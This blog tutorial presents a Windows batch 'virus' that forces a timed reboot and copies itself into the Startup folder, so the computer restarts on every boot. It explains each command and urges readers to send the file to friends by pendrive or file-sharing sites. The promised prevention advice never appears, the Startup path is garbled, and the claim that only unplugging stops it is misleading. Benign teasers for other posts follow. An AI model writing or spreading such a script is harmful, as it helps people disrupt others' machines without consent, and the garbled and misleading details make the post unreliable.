Skip to main content

Batch File Proramming – 3 | Startup Virus

NETWORK TECH WORLD

Batch File Proramming – 3 | Startup Virus

How to create a Batch File

This tutorial is about batch file programming, How to code a bit harmful virus using batch file and How to prevent against this virus. Read this amazing post and don’t forget to leave your feedback in comments.


Batch file commands :

@echo off
shutdown -r -t 100 -c “maverick”
xcopy “filename.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y
____________________________________________________________
Save it as any name with a .bat extension but with name *filename.bat*
you can change “maverick” with what ever message you want, You can also change “100“(in secs) with whatever time you want to restart.
if you changes *filename.bat* to “othername.bat” then also changes the above code to
|| xcopy “othername.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y ||
Send this file to your friends using a pendrive or by uploadig it to rapidshare/hotfile service.

LOGIC:-

.bat- Files having these extensions are known as batch files containg commands to be executed by command interpreter.
@echo off –  This command is used to turn off the display of executing command in command console.
-r – This parameter restarts the PC.You can also use “-s” (without quotes) to shutdown the PC.
-t :- This parameter specifies time in seconds.
-c :- This parameter is used to specify a message in the shutdown box.
xcopy:- This command copies the file specified with double quotes “othername.bat” to the location specifies (in this case startup) with double quotes “C:Documents and SettingsAll UsersStart MenuProgramsStartup”
Startup:This folder contans files to be open when ever your computer boot ups.If you place a file here it will automatically open that file on every boot.
y :- This parameter asks the command prompt to overwrite the file
After running this virus, your PC will restart and again and so on..
only way to stop this mess is to directly plug off the switch from the power board.

Comments

Popular posts from this blog

What is network

NETWORK TECH WORLD What is network  A network is a group of devices, such as computers, servers, and printers, that are connected together and able to communicate with each other. Networks can be classified based on their size and scope, such as a local area network (LAN), which is a network that is confined to a small area, such as a single building or campus, or a wide area network (WAN), which is a network that spans a large geographical area, such as a city or a country. Networks can also be classified based on their communication protocols, such as the Internet, which is a global network that uses the Internet Protocol (IP) to connect devices around the world.

Network Devices

NETWORK TECH WORLD A network device is a hardware device that helps to connect a computer or other devices to a network. There are several types of network devices, including: Routers: These devices route data packets between different networks. Switches: These devices allow multiple devices on a network to communicate with each other by forwarding data packets to the intended recipient. Hubs: These devices are similar to switches, but they do not filter the data packets based on the destination. Instead, they broadcast the data packets to all devices connected to the hub. Bridges: These devices connect two different networks and allow data packets to be transmitted between them. Modems: These devices allow computers to connect to the internet by converting data into a format that can be transmitted over a phone line or cable connection. Firewalls: These devices protect a network by blocking unauthorized access and monitoring traffic for any malicious activity. These are just a few exa...

How to Hack Computer

NETWORK TECH WORLD  How to Hack Someone's Computer As the digital world becomes more and more complex, the need for deliberate, thorough security grows. Yes, we know, you’ve got everything “password protected.” And yes, not every hacker is like the guys in the movies who are able to keyboard their way through complicated layers of encrypted, password-protected security faster than a gamer boots up a new version of Call of Duty. In the real world it’s a lot easier than that. And no, this isn’t actually a tutorial about how to break into someone’s computer or smart phone or tablet. Just an observation of sorts. A caution to our loyal readers, if you like. The Brand Keys 2012 Customer Loyalty Engagement Index reveals that consumers choose laptop computers on the basis of anything but security. Instead, consumers tend to select on the basis of factors like innovative design and brand reputation. This doesn’t mean that security isn’t important, but that it does mean that it’s...